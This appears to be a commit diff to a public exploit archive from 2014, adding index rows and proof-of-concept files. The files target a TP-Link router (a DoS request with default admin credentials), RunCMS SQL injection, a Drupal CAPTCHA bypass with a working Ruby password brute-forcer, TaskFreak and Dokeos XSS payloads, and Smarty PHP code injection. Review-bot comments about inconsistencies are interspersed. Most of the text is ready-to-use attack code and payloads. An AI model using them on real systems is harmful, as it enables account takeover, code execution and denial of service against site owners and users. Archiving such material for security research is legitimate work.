Updated 11_25_2014

Offensive Security 2014-11-25 04:49:14 +00:00
parent 430fa48249
commit 904c13f502
9 changed files with 283 additions and 0 deletions


@ -31824,3 +31824,11 @@ id,file,description,date,author,platform,type,port
35331,platforms/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 EmployeeSearch.cc Multiple Parameter XSS",2011-02-10,"Core Security",php,webapps,0
35332,platforms/php/webapps/35332.txt,"Dolphin 7.0.4 Multiple Cross Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps,0
35333,platforms/php/webapps/35333.py,"webERP 4.0.1 'InputSerialItemsFile.php' Arbitrary File Upload Vulnerability",2011-02-10,"AutoSec Tools",php,webapps,0
35334,platforms/php/webapps/35334.txt,"RunCMS 2.2.2 'register.php' SQL Injection Vulnerability",2011-02-10,"High-Tech Bridge SA",php,webapps,0
35335,platforms/php/webapps/35335.html,"Drupal CAPTCHA Module Security Bypass Vulnerability",2011-02-11,anonymous,php,webapps,0
35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 index.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0
35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0
35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0
35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0
35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 'style' Parameter Cross Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0
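Review bot: several titles in this hunk disagree with the advisory files added in the same commit. The Smarty row (35343) says "<= 2.6.9" while 35343.txt states that versions prior to 3.0.7 are vulnerable; the Dokeos row (35347) reads "Dokeos 1.8.6 2" where 35347.txt says 1.8.6.2; and the Drupal CAPTCHA row (35335) is credited to "anonymous" although the script header names Michele "antisnatchor" Orru' as author and the file itself is a Ruby script filed under a .html path. Align the version strings, author field and file extension with the files before merging.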



@ -0,0 +1,57 @@
TP-Link TL-WR740N Wireless Router MitM httpd Denial Of Service
Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version:
- Firmware version: 3.17.0 Build 140520 Rel.75075n (Released: 5/20/2014)
- Firmware version: 3.16.6 Build 130529 Rel.47286n (Released: 5/29/2013)
- Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
- Hardware version: WR740N v4 00000000 (v4.23)
- Model No. TL-WR740N / TL-WR740ND
Summary: The TL-WR740N is a combined wired/wireless network connection
device integrated with internet-sharing router and 4-port switch. The
wireless N Router is 802.11b&g compatible based on 802.11n technology
and gives you 802.11n performance up to 150Mbps at an even more affordable
price. Bordering on 11n and surpassing 11g speed enables high bandwidth
consuming applications like video streaming to be more fluid.
Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
denial of service vulnerability when processing a HTTP GET request. This
issue occurs when the web server (httpd) fails to handle a HTTP GET request
over a given default TCP port 80. Resending the value 'new' to the 'isNew'
parameter in 'PingIframeRpm.htm' script to the router thru a proxy will
crash its httpd service denying the legitimate users access to the admin
control panel management interface. To bring back the http srv and the
admin UI, a user must physically reboot the router.
Tested on: Router Webserver
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5210
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5210.php
13.11.2014
---
Replay
GET /userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&lineNum=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
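Review bot: the "Replay" request carries an "Authorization: Basic" header, so the crash is reproduced from an authenticated management session, but the "Desc" paragraph presents it as a plain GET on port 80 and "Tested on: Router Webserver" names none of the three firmware builds listed under "Affected version". State the authentication prerequisite explicitly and record which build the replay was captured on. The Authorization value is also a real credential pair rather than a placeholder; replace it with something like "Authorization: Basic <base64 credentials>" so the advisory does not ship working credentials.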


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46342/info
RunCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
RunCMS 2.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/register.php?uname=user3&email=user%40test2.com&user_viewemail=0&name=user3&address=nope&zip_code=123&town=nope&user_from=nope&phone=123&user_avatar=blank.gif&timezone_offset=123'SQL_CODE_HERE&url=http%3A%2F%2Fnope&language=english&passw=password&vpassw=password&user_mailok=1&verify_text=&verify_crc=&keystring=368483&op=finish
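Review bot: the description never names the injection point; the only indication is the "SQL_CODE_HERE" placeholder appended to the "timezone_offset" value in the PoC URL. Add a sentence stating that the "timezone_offset" parameter of register.php is the input used unsanitized in the query, so the entry can be understood without decoding the URL.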

platforms/php/webapps/35335.html Executable file

@ -0,0 +1,128 @@
source: http://www.securityfocus.com/bid/46344/info
The CAPTCHA module for Drupal is prone to a security-bypass vulnerability that occurs in the CAPTCHA authentication routine.
Successful exploits may allow attackers to bypass the CAPTCHA-based authentication routine, allowing attackers to perform brute-force attacks.
# Drupal Captcha bruteforcing bypass
# This is a Proof Of Concept to demonstrate a logic security flow
# in the way drupal captcha is used to protect login forms
# from bruteforce. If the captcha challenge is solved, the next
# login attempts can be issued without solving any new captcha challenge.
# Usage: change URL, PATH, USERAGENT as you need.
# Change cookie, captcha_sid, captcha_token, form_build_id with the values
# you got in the html response AFTER the captcha is solved. This is needed
# in order to issue the first request as valid.
# Unique tokens will be then updated automatically .
# author: Michele "antisnatchor" Orru'
require "net/http"
require "net/https"
require "erb"
require "singleton"
require "rubygems"
require "nokogiri"
URL = 'antisnatchor.com'
PATH = '/user'
USERAGENT = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13'
# easy to enhance this reading list from a file, but this is just a PoC
USERNAME_LIST = ['admin']
PASSWD_LIST = ['test1', 'test2', 'test3', 'guessme']
# these are the session values needed to create valid http requests, after
# the reCaptcha has been solved the first time, leaving the login form
# without a new captcha challenge
cookie = "SESS7fa63be60e31be67df6f271d7756698c=tgg548ajq53m4pb0ne18nsunm0; has_js=1;"
captcha_sid = "476"
form_id = "user_login"
# these anti-XSRF tokens will change for every http response,
# so nokogiri is used to parse the html response in order to create
# the next http request with the valid anti-xsrf/captcha tokens.
# These initial values will be changed accordingly and automatically
# for each request .
captcha_token = "d853d6df05f6c6a956a46f20c8fe20aa"
form_build_id = "form-43fb0bcbcb140066a782a3fc23ab1ab7"
authenticated = false;
@http = Net::HTTP.new(URL, 80)
@http.use_ssl = false
puts "+Initial xsrf token [" + form_build_id + "]"
puts "+Initial captcha token [" + captcha_token + "]"
puts "+Dictionary attack with [" + PASSWD_LIST.size.to_s + "] passwords"
# I'm learning ruby :-)
passwd_counter = 0
while !authenticated && passwd_counter < PASSWD_LIST.size do
puts "+Testing password [" + PASSWD_LIST[passwd_counter] + "]"
post_data = "name=" + USERNAME_LIST[0] + "&pass=" + PASSWD_LIST[passwd_counter] + "&form_build_id=" + form_build_id +
"&form_id=" + form_id + "&captcha_sid="+ captcha_sid +
"&captcha_token=" + captcha_token + "&op=Log+in"
@headers = {
'Cookie' => cookie,
'Referer' => 'http://' + URL + PATH,
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => USERAGENT
}
puts "+Request headers = " + @headers.inspect
resp, data = @http.post2(PATH, post_data, @headers)
# loads the response in nokogiri to parse anti-XSRF tokens
doc = Nokogiri::HTML(data)
puts '+Code = ' + resp.code
puts '+Message = ' + resp.message
# "debug" code
#puts "=================================================== raw response START ======================================================="
#puts data
#puts "=================================================== raw response END ======================================================="
if data.index("CAPTCHA session reuse attack detected") != nil
puts "Doh', we've been detected by Drupal...quitting now"
break
end
if data.index("Sorry, unrecognized username or password") == nil && resp.code == "302"
# if credentials will be valid, there will be a 302 response with
# a new location header, corresponding to the user home page (http://antisnatchor.com/user/1 for instance)
authenticated = true
else
#parse the anti-xsrf and captcha tokens from the response
doc.css('input[id^=form]').each do |form_build_id|
form_build_id = form_build_id['id']
puts "+New xsrf token [" + form_build_id + "]"
end
doc.css('input[id^=edit-captcha-token]').each do |captcha_token_id|
captcha_token = captcha_token_id['value']
puts "+New captcha token [" + captcha_token + "]"
end
# I'm still learning ruby :-)
passwd_counter = passwd_counter + 1;
end
break if authenticated == true
end
if authenticated
puts "+Succesfully authenticated user[" + USERNAME_LIST[0] + "] with password [" + PASSWD_LIST[passwd_counter] + "]"
else
puts "+No passwords are valid for user [" + USERNAME_LIST[0] + "]. Dictionary attack failed."
end
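Review bot: this is a Ruby script but it is added as platforms/php/webapps/35335.html; with a .html extension it will be rendered as a page rather than read as source, so it should be 35335.rb (and the CSV row updated to match). The header comment should also state the Ruby version it was written for: it relies on the deprecated two-value return of Net::HTTP#post2 ("resp, data = @http.post2(...)"), which yields only a response object on Ruby 1.9+, leaving "data" nil, and the block parameter "form_build_id" in "doc.css('input[id^=form]').each do |form_build_id|" shadows the outer variable of the same name under 1.9+ scoping, so the refreshed token is only ever assigned to the block-local copy. The string the script aborts on, "CAPTCHA session reuse attack detected", is the CAPTCHA module's own reuse check and is worth calling out in the header as the condition the module already detects.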

platforms/php/webapps/35336.txt Executable file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/46350/info
TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
<script type="text/javascript">function xss(){document.forms["zappa"].submit();}</script>
<form name="zappa" action="http://taskfreak/index.php" method="POST" id="zappa">
<input type="hidden" name="sProject" value="0" />
<input type="hidden" name="id" value="" />
<input type="hidden" name="mode" value="save" />
<input type="hidden" name="sContext" value='%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20' />
<input type="hidden" name="sort" value='"><script>alert(1)</script>' />
<input type="hidden" name="dir" value='"><script>alert(2)</script>' />
<input type="hidden" name="show" value='"><script>alert(3)</script>' />
</form>
<a href="javascript: xss();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a>
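Review bot: the PoC markup is malformed: "<h3>Exploit!<h3>" opens a second h3 instead of closing the first, and the "center" element sits inside "font" and "b" rather than wrapping them; write "</h3>" and nest the closing tags so the anchor is well-formed. The description above the form is BID boilerplate and does not name the injected parameters (sContext, sort, dir, show), which only the hidden inputs reveal; list them in the text.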

platforms/php/webapps/35337.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/46350/info
TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
http://taskfreak/print_list.php?dir=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://taskfreak/print_list.php?show=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
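Review bot: the description does not name the affected parameters; only the two URLs show that "dir" and "show" of print_list.php are reflected unsanitized. Add a line listing them so the entry is readable without decoding the URL-encoded payloads.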

platforms/php/webapps/35338.txt Executable file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/46350/info
TaskFreak! is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
GET /taskfreak/rss.php HTTP/1.1
Referer: ">Waddup!
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
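Review bot: the description says nothing about the injection vector; only the CSV title and the raw request show that the HTTP Referer header is what rss.php reflects. Add a sentence stating that the Referer value is echoed into the feed output unsanitized, and use the same "taskfreak" host placeholder as the other two TaskFreak entries instead of "localhost" so the three files read consistently.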


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46366/info
Smarty Template Engine is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Versions prior to Smarty Template Engine 3.0.7 are vulnerable.
$smarty.template : '.(include 'hack.php').'.tpl
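Review bot: the affected range is inconsistent: this text says versions prior to 3.0.7 are vulnerable, while the CSV title for the same entry says "<= 2.6.9". Pick one range and use it in both places. The single PoC line also gives no context for where the "$smarty.template" value shown is supplied or which part of it is attacker-controlled; a one-line note would make the entry usable.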


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/46370/info
Dokeos is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Dokeos 1.8.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/dokeos/main/inc/latex.php?code=%22style=%22top:0;position:absolute;width:9999px;height:9999px;%22onmouseover%3d%22alert(0)
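Review bot: the version string differs between this file ("Dokeos 1.8.6.2") and the CSV title ("Dokeos 1.8.6 2"); use the dotted form in both. The description also does not name the parameter; the URL shows "code" of main/inc/latex.php as the reflected input, which should be stated in the text.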